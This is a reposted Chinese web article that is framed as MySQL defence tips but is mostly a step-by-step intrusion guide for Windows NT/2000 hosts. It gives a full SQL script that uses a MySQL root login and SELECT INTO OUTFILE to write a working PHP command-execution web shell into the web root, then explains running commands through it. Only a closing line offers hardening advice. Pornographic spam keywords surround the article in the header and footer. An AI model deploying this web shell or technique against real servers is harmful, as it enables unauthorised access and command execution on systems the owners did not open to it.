国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > MySQL > 正文

通過mysql入侵NT和win2000的一些防范技巧

2024-07-24 12:57:25
字體:
來源:轉載
供稿:網友
許多NT和win2000機器上面裝有MySQL和php。而mysql默認數據庫root賬號為空,這就給入侵者一個途徑來入侵該機器。如果修改了數據庫root的賬號密碼,而IIS的一些其他漏洞導致源代碼泄漏也可能看到數據庫的賬號和密碼。假設我們已經拿到了數據庫的密碼,看看我們如何通過mysql數據庫來獲得該機器的一定權限。
首先通常情況下,一般mysql和php配合使用,大多數NT和win2000的機器上如果使用php一般都會使用mysql。而默認情況下windows上的mysql是允許遠程連接的。而裝在linux等上的mysql是不允許遠程連接的。入侵的思路是寫一個shell腳本到web目錄。就可以通過這個shell教本來執行命令了。而一般情況下,windows的web服務器是IIS,默認也是支持asp腳本的。網上也隨處可見asp的sehll腳本,只要將這個asp的腳本傳到web目錄就好了。但是我覺得那些腳本都比較麻煩。而如果目標機器上面有php的話就可以用php腳本了。在這里我用php腳本來寫shell。首先我們要用mysql的客戶端連結到該機器,并執行我們的sql語句來在web目錄生成php的shell腳本。
C:/mysql/bin>mysql -h xxx.xxx.xxx.xxx -uroot <php.sql

C:/mysql/bin>

下面是php.sql的內容:
use test;
create table tmp(cmd TEXT);
insert into tmp values('<body onload=document.form1.cmd.focus()><?if (isset($cmd)){$cmd=stripslashes($cmd);exec(/"$cmd > temp.dat/");}?><style type=/"text/CSS/"><!/-/- .form1 {BACKGROUND: #FFFFFF; BORDER-BOTTOM: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; COLOR: #3c464f; FONT-SIZE: 9pt; clip: rect( ); cursor: text; height: auto; width: auto; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px/-/-></style><p class=/"title2/"> </p><form name=/"form1/" method=//"post/" action=/"/cmd2.php/"> <input type=/"text/" name=/"cmd/" size=/"50/" class=/"form1/"></form><form name=/"form2/" method=/"post/" action=/"/"> <p> <textarea name=/"text/" cols=/"120/" rows=/"50/" class=/"form1/"><?if(isset($cmd)){readfile(/"temp.dat/");unlink(/"temp.dat/");}?></textarea> </p></form></body>');
select * from tmp into outfile 'd://new//cmd2.php';
drop table tmp;

上面的sql語句是創建一個名字為tmp的table,將腳本輸入到數據庫,然后再將這個腳本保存成d:/new/cmd2.php。然后刪除tmp這個我們創建的table。這里的d:/new的目錄是該機器的web目錄。然后我們就可以在瀏覽器中輸http://xxx.xxx.xxx.xxx/cmd2.php,就可以利用這個shell執行命令了。至此我們已經獲得了該網站的一個guest權限的shell了。我們可以通過這個shell腳本寫個ftp腳本來上傳文件,也可以利用這個shell來進行其他guest權限能夠執行的一些東東了。這里需要注意的是如果cmd2.php已經存在了這個sql腳本是不能運行成功的。這個php腳本不能寫成功。
關鍵的問題在于獲得數據庫的密碼并且能夠找到web目錄。然后一切都不成問題了。
安全建議:設置mysql數據庫的密碼,并且要有一定的強度。設置好IIS避免泄漏源代碼,不要直接在web目錄編輯腳本等文件,因為有些編輯器會自動產生一個備份文件,一般為.bak的擴展名,這樣惡意攻擊者就可能直接打開這個.bak文件從而泄漏源代碼,比如global.asa.bak。

 
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 天津市| 红桥区| 黄大仙区| 新竹市| 裕民县| 乌什县| 东阿县| 弥渡县| 吉林市| 富锦市| 昌黎县| 长宁县| 七台河市| 北川| 中山市| 怀柔区| 江阴市| 铁岭县| 启东市| 吴忠市| 丹江口市| 乌兰浩特市| 阜南县| 大竹县| 永川市| 阿鲁科尔沁旗| 广灵县| 金阳县| 百色市| 泽州县| 堆龙德庆县| 喀喇沁旗| 章丘市| 沙雅县| 青岛市| 贞丰县| 香河县| 柞水县| 上思县| 玉田县| 盘锦市|